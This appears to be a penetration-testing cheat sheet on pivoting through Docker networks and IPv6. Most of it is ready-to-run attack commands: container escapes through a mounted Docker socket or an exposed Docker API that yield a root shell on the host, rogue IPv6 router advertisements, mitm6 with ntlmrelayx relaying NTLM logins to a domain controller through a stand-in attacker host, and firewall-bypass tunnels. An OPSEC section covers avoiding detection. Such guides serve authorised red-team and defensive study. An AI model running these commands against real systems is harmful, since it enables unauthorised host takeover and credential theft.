Docker and IPv6 Pivoting
#Overview
Two commonly overlooked pivot vectors: Docker networking (container-to-host, container-to-container) and IPv6 (often unfiltered by firewalls). Both provide lateral movement paths that defenders frequently miss.
#Docker Pivoting
#Docker Network Models
| Network Type | Scope | Pivoting Potential |
|---|---|---|
| bridge (default) | Container ↔ Container on same host | Medium |
| host | Container shares host network stack | High |
| overlay | Container ↔ Container across hosts | High |
| macvlan | Container gets its own MAC/IP | High |
| none | No networking | None |
#Container to Host
If you have shell access inside a container, escaping to the host network depends on the network mode.
# Check network mode
cat /proc/1/net/if_inet6 2>/dev/null && echo "IPv6 enabled"
cat /proc/net/fib_trie 2>/dev/null | grep "HOST LOCAL" -B1
# If host network mode: you're already on the host network
# Just scan directly:
nmap -sn 172.16.0.0/24
# If bridge mode: you're on a Docker bridge (usually 172.17.0.0/16)
# The host gateway is usually 172.17.0.1
ip route | grep default
# default via 172.17.0.1
# Scan the host
nmap -sn 172.17.0.1
# Scan the host's other networks through the gateway
nmap -sn 172.16.0.0/24 -e eth0 -g 172.17.0.1
BASH
#Docker Socket Escape
If the Docker socket (/var/run/docker.sock) is mounted inside the container, you can create a new container with host networking.
# Check if Docker socket is mounted
ls -la /var/run/docker.sock
# Install Docker CLI inside container
curl -fsSL https://download.docker.com/linux/static/stable/x86_64/docker-24.0.7.tgz | tar xz
cp docker/docker /usr/local/bin/
# Create a container with host networking (full host access)
docker -H unix:///var/run/docker.sock run --network host -v /:/host alpine chroot /host /bin/bash
# Or mount host filesystem:
docker -H unix:///var/run/docker.sock run -v /:/host alpine chroot /host /bin/bash
BASH
#Container-to-Container Lateral Movement
# From one container, discover other containers
# On the Docker bridge network:
arp-scan -l
nmap -sn 172.17.0.0/24
# If overlay network (multi-host Docker Swarm):
# Find overlay subnet
ip addr | grep -A2 docker_gwbridge
ip addr | grep -A2 overlay
# Scan overlay network
nmap -sn 10.0.0.0/24
BASH
#Docker API Pivot
# If Docker API is exposed (port 2375/2376) on another host
# Use it to create a privileged container on that host
docker -H tcp://172.16.0.10:2375 run --network host -v /:/host alpine chroot /host /bin/bash
# List containers on remote Docker host
docker -H tcp://172.16.0.10:2375 ps -a
# Execute commands in existing containers
docker -H tcp://172.16.0.10:2375 exec -it <container_id> /bin/bash
BASH
#IPv6 Pivoting
IPv6 is often enabled but unfiltered. Many firewalls only filter IPv4, and IPv6 provides an alternate path to reach hosts that are otherwise blocked.
#IPv6 Discovery
# Check if IPv6 is enabled
ip -6 addr | grep inet6
cat /proc/sys/net/ipv6/conf/all/disable_ipv6 # 0 = enabled
# Discover IPv6 neighbors
ip -6 neighbor show
# Multicast discovery (find all IPv6 hosts on the link)
ping6 -c 5 ff02::1%eth0
# After ping6, check neighbor cache
ip -6 neighbor show
# Scan IPv6 subnet
nmap -6 -sn 2001:db8::/120
# With alive6 (from THC-IPv6 toolkit)
alive6 eth0
# With onetwopunch (IPv4 + IPv6 scanning)
# https://github.com/arch4ngel/onetwopunch
BASH
#THC-IPv6 Toolkit
# Install
apt install thc-ipv6
# Discover alive hosts
alive6 eth0
# Detect rogue IPv6 routers (RA) on the network
detect-new-ip6 eth0
# Detect IPv6 router advertisements
parasite6 eth0 # Inject rogue RAs (MITM)
# DNS enumeration over IPv6
dnsdict6 -d4 -t10 domain.com
# Enumerate IPv6 addresses via reverse DNS
dnsrevenum6 domain.com 2001:db8::/64
BASH
#mitm6 (IPv6 MITM)
mitm6 exploits Windows' preference for IPv6 over IPv4 to perform man-in-the-middle attacks.
# Install
pip3 install mitm6
# Basic MITM — respond to DHCPv6 requests, become DNS server
sudo mitm6 -d targetdomain.local
# Target specific host
sudo mitm6 -d targetdomain.local --target 2001:db8::100
# mitm6 + ntlmrelayx ( relay NTLM auth)
# Terminal 1:
sudo mitm6 -d targetdomain.local
# Terminal 2:
ntlmrelayx.py -6 -t ldaps://dc.targetdomain.local -wh attacker.domain.com -l /tmp/loot
BASH
#IPv6 Tunnel Through IPv4 Network
When IPv6 is not natively available but the target network uses IPv6 internally, create an IPv6-over-IPv4 tunnel.
# 6in4 tunnel (Linux)
ip tunnel add tun6in4 mode sit remote <pivot_ip> local <your_ip> ttl 255
ip link set tun6in4 up
ip addr add 2001:db8::1/64 dev tun6in4
ip -6 route add 2001:db8::/64 dev tun6in4
# Teredo tunnel (if 6in4 blocked)
apt install miredo
miredo
ip -6 addr | grep teredo
# 6to4 tunnel (public relay)
ip tunnel add 6to4 mode sit remote any local <your_public_ip>
ip link set 6to4 up
ip addr add 2002:<hex_ip>::1/16 dev 6to4
ip -6 route add 2002::/16 dev 6to4
BASH
#IPv6 Firewall Bypass
# If IPv4 is firewalled but IPv6 is not, switch tools to IPv6
nmap -6 -sT 2001:db8::10 -p 22,80,443,445
# SSH over IPv6
ssh -6 user@2001:db8::10
# Curl over IPv6
curl -6 http://[2001:db8::10]/
# HTTP over IPv6 with ncat
ncat -6 2001:db8::10 80
# SMB over IPv6
smbclient //[2001:db8::10]/share -U user
BASH
#Common Pitfalls
- Docker bridge isolation: By default, Docker bridge networks isolate containers. You can't reach the host directly without additional configuration or the host network mode.
- IPv6 link-local only: Some hosts only have link-local IPv6 (fe80::/10). You need to be on the same link to reach them.
- Docker socket permissions: You need root or docker group membership to use the Docker socket.
- IPv6 privacy addresses: Windows and some Linux hosts use temporary IPv6 addresses that change over time. Use stable addresses when possible.
- Overlay network encryption: Docker overlay networks can be encrypted. Without the key, you can't intercept overlay traffic.
#OPSEC Considerations
- Docker socket access is heavily monitored in production environments
- Creating new containers is logged by Docker and visible in
docker ps - IPv6 multicast discovery (ff02::1) is visible to any IPv6-aware IDS
- mitm6 creates DHCPv6 responses that may be detected by network monitoring
- THC-IPv6 tools generate noisy traffic — use selectively
#Cross-References
- Network Enumeration — Interface and route discovery (IPv4 + IPv6)
- Platform Strategies — Which tools work on which OS
- 09 - Lateral Movement — Container lateral movement